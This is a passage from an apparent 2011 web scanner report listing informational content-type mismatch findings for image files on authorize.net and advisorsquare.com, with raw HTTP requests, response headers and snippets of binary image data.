s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dexpedia1%253D%252526pid%25253DFAQ%25252520Support%2525253ASearch%25252520Results%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//support.expedia.com/euf/assets/images/go_btn.gif%252526ot%25253DIMAGE%2526undefinedtoJSONString%252CtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%3B
Content-Length: 1595

filters=%7B%22recordKeywordSearch%22%3Atrue%2C%22searchType%22%3A%7B%22filters%22%3A%7B%22rnSearchType%22%3A%22searchType%22%2C%22fltr_id%22%3A5%2C%22data%22%3A5%2C%22oper_id%22%3A1%2C%22report_id%22%
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 02:48:58 GMT
Server: Apache
P3P: policyref="http://support.expedia.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: cp_session=AHpRJVAkU3cBaVQkBmwIXlIvA3tUUQI8BnQKOVR0BnwAclQoCy0AOQR%2BWS0MflEiW3sFOwV0BT4GIAw2XXxUdFAmWCUCMwQTAXRUbwFDBCIAM1FBUCBTIgEkVCgGMAhxUiYDNFRlAj8GYQp8VDUGPwA9VHgLPQBFBHVZegxpUXJbOwURBTcFYwZnDDBdfFQuUDJYbAJsBHcBYlQbAXQEdABiUXVQclNmARdUYAY5CGxSLgN0VDMCYAZzCidUNAY9AHVUbgtLADIEIFk9DD1RNFtgBSMFLwUhBjEMGl1JVFVQBVglAjIEZAEyVDQBcQRjACRRNFATUxEBB1RRBnAIO1JgAzVUYAIiBmUKY1RzBmMAFFR4Cz0ANQRoWWEMf1E%2FWywFZAUSBTEGJwxsXU5UMVBzWDICRgRgAWFUbAE0BCIAM1ExUCVTMgEgVHIGcAg6UhIDYFQkAmQGNgogVDEGNQA0VHgLPABHBDRZPwwuUWVbPwUxBS4FdwZ2DHtdO1REUGZYJQIyBGQBPVQyAWQEYwAkUTRQE1NkAXZUNAZjCGpSFwM1VHQCcwYzChZUZwZ1AGJUawt9AGUEd1l9DC5RZFtNBXoFYgU2BjsMe107VEZQdFh9AiwEcAE0VH8BPwQlAF1RKFAkUzABIFR1BjwIZlI4Aw1ULgIaBjMKHFQmBgoAE1RlCzoAVQQ2WWQMelECW04FJwVmBWUGdQxjXTVUIlAr; path=/
RNT-Time: D=157897 t=1304736538438344
RNT-Machine: 01
Vary: Accept-Encoding
X-Cnection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 1532

{"data":[["<span style=\"color:#008000\">Updated<\/span>","<a href=\"\/app\/answers\/detail\/a_id\/3823\">What is the Expedia Credit Card Guarantee?<\/a>","Your credit card is protected whenever you m
...[SNIP]...
33.24. http://verify.authorize.net/anetseal/images/secure90x72.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://verify.authorize.net
Path:   /anetseal/images/secure90x72.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /anetseal/images/secure90x72.gif HTTP/1.1
Host: verify.authorize.net
Proxy-Connection: keep-alive
Referer: http://www.clone-systems.com/ecommerce/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 2894
Content-Type: image/gif
Last-Modified: Fri, 26 Mar 2010 17:33:22 GMT
Accept-Ranges: bytes
ETag: "0dd746eacdca1:a13"
Server: Microsoft-IIS/6.0
P3P: CP="NOI NID NAV"
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 00:50:20 GMT

.PNG
.
...IHDR...Z...H.....v.......tEXtSoftware.Adobe ImageReadyq.e<..
.IDATx...?.+G...G.G...pK...ED.S..#DG..P..FQ:#.D.8....'BH....H.n...".E.....    ..?.....w..]..{o.H#..g..3.<...;s...{O...S...zh...|g.
...[SNIP]...
33.25. https://verify.authorize.net/anetseal/images/secure90x72.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://verify.authorize.net
Path:   /anetseal/images/secure90x72.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /anetseal/images/secure90x72.gif HTTP/1.1
Host: verify.authorize.net
Connection: keep-alive
Referer: https://www.clone-systems.com/ecommerce/login.php?action=reset_password
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 2894
Content-Type: image/gif
Last-Modified: Fri, 26 Mar 2010 17:33:22 GMT
Accept-Ranges: bytes
ETag: "0dd746eacdca1:a13"
Server: Microsoft-IIS/6.0
P3P: CP="NOI NID NAV"
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 00:56:38 GMT

.PNG
.
...IHDR...Z...H.....v.......tEXtSoftware.Adobe ImageReadyq.e<..
.IDATx...?.+G...G.G...pK...ED.S..#DG..P..FQ:#.D.8....'BH....H.n...".E.....    ..?.....w..]..{o.H#..g..3.<...;s...{O...S...zh...|g.
...[SNIP]...
33.26. http://www.advisorsquare.com/design_gallery/welcome/HP_pict1.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /design_gallery/welcome/HP_pict1.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /design_gallery/welcome/HP_pict1.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Last-Modified: Fri, 06 Jul 2007 22:38:10 GMT
Accept-Ranges: bytes
ETag: "f5b47c541ec0c71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:46:02 GMT
Content-Length: 10618

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

............................................................................................................p..
...[SNIP]...
33.27. http://www.advisorsquare.com/design_gallery/welcome/HP_pict2.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /design_gallery/welcome/HP_pict2.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /design_gallery/welcome/HP_pict2.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Last-Modified: Fri, 06 Jul 2007 22:38:10 GMT
Accept-Ranges: bytes
ETag: "6524b1541ec0c71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:46:02 GMT
Content-Length: 2873

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

..........................................................................................................I.q..
...[SNIP]...
33.28. http://www.advisorsquare.com/design_gallery/welcome/HP_pict3.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /design_gallery/welcome/HP_pict3.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /design_gallery/welcome/HP_pict3.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Last-Modified: Fri, 06 Jul 2007 22:38:10 GMT
Accept-Ranges: bytes
ETag: "fdf5e7541ec0c71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:46:04 GMT
Content-Length: 3175

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

..........................................................................................................I.q..
...[SNIP]...
33.29. http://www.advisorsquare.com/design_gallery/welcome/HP_pict4.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /design_gallery/welcome/HP_pict4.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /design_gallery/welcome/HP_pict4.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Last-Modified: Fri, 06 Jul 2007 22:38:11 GMT
Accept-Ranges: bytes
ETag: "95c71e551ec0c71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:46:14 GMT
Content-Length: 3789

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

..........................................................................................................I.q..
...[SNIP]...
33.30. http://www.advisorsquare.com/new/AccountantSquareDemo/tax_calendar.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /new/AccountantSquareDemo/tax_calendar.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /new/AccountantSquareDemo/tax_calendar.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Last-Modified: Tue, 19 Mar 2002 22:28:51 GMT
Accept-Ranges: bytes
ETag: "6c7a2c7295cfc11:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:48:26 GMT
Content-Length: 2214

......JFIF.....`.`.....C....................!.....! ...... %'('% 004400@@@@@@@@@@@@@@@...C......................(.....(1% %1,/(((/,661166@@?@@@@@@@@@@@@......U.O.................................
...[SNIP]...
33.31. http://www.advisorsquare.com/new/BrochureLevel/GA15_banner.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /new/BrochureLevel/GA15_banner.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /new/BrochureLevel/GA15_banner.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Last-Modified: Mon, 10 Sep 2007 21:54:11 GMT
Accept-Ranges: bytes
ETag: "80bed1ff5f3c71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:46:16 GMT
Content-Length: 31110

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    .......................................................... ..
...[SNIP]...
33.32. http://www.advisorsquare.com/new/BrochureLevel/HP_pict2.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /new/BrochureLevel/HP_pict2.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /new/BrochureLevel/HP_pict2.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Last-Modified: Thu, 31 May 2007 17:12:34 GMT
Accept-Ranges: bytes
ETag: "e65487e1a6a3c71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:46:17 GMT
Content-Length: 13210

......JFIF.....H.H....    .Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2005:09:13 16:01:12.................
...[SNIP]...
33.33. http://www.advisorsquare.com/new/BrochureLevel/HP_pict3.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /new/BrochureLevel/HP_pict3.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /new/BrochureLevel/HP_pict3.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Last-Modified: Thu, 31 May 2007 17:12:34 GMT
Accept-Ranges: bytes
ETag: "e65487e1a6a3c71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:46:26 GMT
Content-Length: 15521

......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2005:09:13 16:00:33.................
...[SNIP]...
33.34. http://www.advisorsquare.com/new/BrochureLevel/HP_welcomePhoto.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /new/BrochureLevel/HP_welcomePhoto.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /new/BrochureLevel/HP_welcomePhoto.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Last-Modified: Mon, 04 Jun 2007 18:36:04 GMT
Accept-Ranges: bytes
ETag: "c0c78835d7a6c71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:46:24 GMT
Content-Length: 11479

......JFIF.....d.d......Ducky.......<.....&Adobe.d...........
.......c...%..,................    ...    .......

.

.......................................................................................
...[SNIP]...
33.35. http://www.advisorsquare.com/new/BusinessLevel/FA09Banner.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /new/BusinessLevel/FA09Banner.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /new/BusinessLevel/FA09Banner.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Last-Modified: Mon, 10 Sep 2007 21:56:01 GMT
Accept-Ranges: bytes
ETag: "80f64860f5f3c71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:46:29 GMT
Content-Length: 44414

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    .............................................................
...[SNIP]...
33.36. http://www.advisorsquare.com/new/BusinessLevel/HP_pict1.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /new/BusinessLevel/HP_pict1.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /new/BusinessLevel/HP_pict1.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Last-Modified: Thu, 31 May 2007 17:38:48 GMT
Accept-Ranges: bytes
ETag: "534d58baaa3c71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:46:41 GMT
Content-Length: 21369

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

............................................................................................................p..
...[SNIP]...
33.37. http://www.advisorsquare.com/new/BusinessLevel/HP_pict2.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /new/BusinessLevel/HP_pict2.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /new/BusinessLevel/HP_pict2.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Last-Modified: Thu, 31 May 2007 17:30:24 GMT
Accept-Ranges: bytes
ETag: "abbdfe5ea9a3c71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:46:32 GMT
Content-Length: 17227

......JFIF.....H.H.....Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2005:09:13 10:51:57.................
...[SNIP]...
33.38. http://www.advisorsquare.com/new/BusinessLevel/HP_pict3.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /new/BusinessLevel/HP_pict3.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /new/BusinessLevel/HP_pict3.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Last-Modified: Thu, 31 May 2007 17:30:24 GMT
Accept-Ranges: bytes
ETag: "62015fa9a3c71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:47:29 GMT
Content-Length: 19193

......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2005:09:13 10:54:47.................
...[SNIP]...
33.39. http://www.advisorsquare.com/new/BusinessLevel/HP_pict4.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /new/BusinessLevel/HP_pict4.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /new/BusinessLevel/HP_pict4.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Last-Modified: Thu, 31 May 2007 17:30:24 GMT
Accept-Ranges: bytes
ETag: "62015fa9a3c71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:47:29 GMT
Content-Length: 17399

......JFIF.....H.H.....Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2005:09:13 10:54:48.................
...[SNIP]...
33.40. http://www.advisorsquare.com/new/PremiumLevel/FA03Banner.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /new/PremiumLevel/FA03Banner.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /new/PremiumLevel/FA03Banner.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Last-Modified: Fri, 05 Jan 2007 21:33:51 GMT
Accept-Ranges: bytes
ETag: "ae3199311131c71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:47:34 GMT
Content-Length: 28107

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

............................................................................................................ ..
...[SNIP]...
33.41. http://www.advisorsquare.com/new/PremiumLevel/HP_pict3.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /new/PremiumLevel/HP_pict3.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /new/PremiumLevel/HP_pict3.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Last-Modified: Thu, 31 May 2007 18:01:17 GMT
Accept-Ranges: bytes
ETag: "6a33e5afada3c71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:46:42 GMT
Content-Length: 17259

......JFIF.....H.H....Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2005:09:13 10:28:15.................
...[SNIP]...
33.42. http://www.advisorsquare.com/new/PremiumLevel/HP_pict4.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /new/PremiumLevel/HP_pict4.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /new/PremiumLevel/HP_pict4.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Last-Modified: Thu, 31 May 2007 18:01:17 GMT
Accept-Ranges: bytes
ETag: "6a33e5afada3c71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:46:56 GMT
Content-Length: 15900

......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2005:09:13 10:26:34.................
...[SNIP]...
33.43. http://www.advisorsquare.com/new/PremiumLevel/leftframe.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /new/PremiumLevel/leftframe.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /new/PremiumLevel/leftframe.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Last-Modified: Fri, 05 Jan 2007 21:37:27 GMT
Accept-Ranges: bytes
ETag: "ae6358b21131c71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:47:35 GMT
Content-Length: 25705

......JFIF.....H.H.....;Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS2 Windows.2007:01:05 13:35:46.........
...[SNIP]...
33.44. http://www.advisorsquare.com/new/asframeless02/Business02_asBanner.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /new/asframeless02/Business02_asBanner.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /new/asframeless02/Business02_asBanner.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
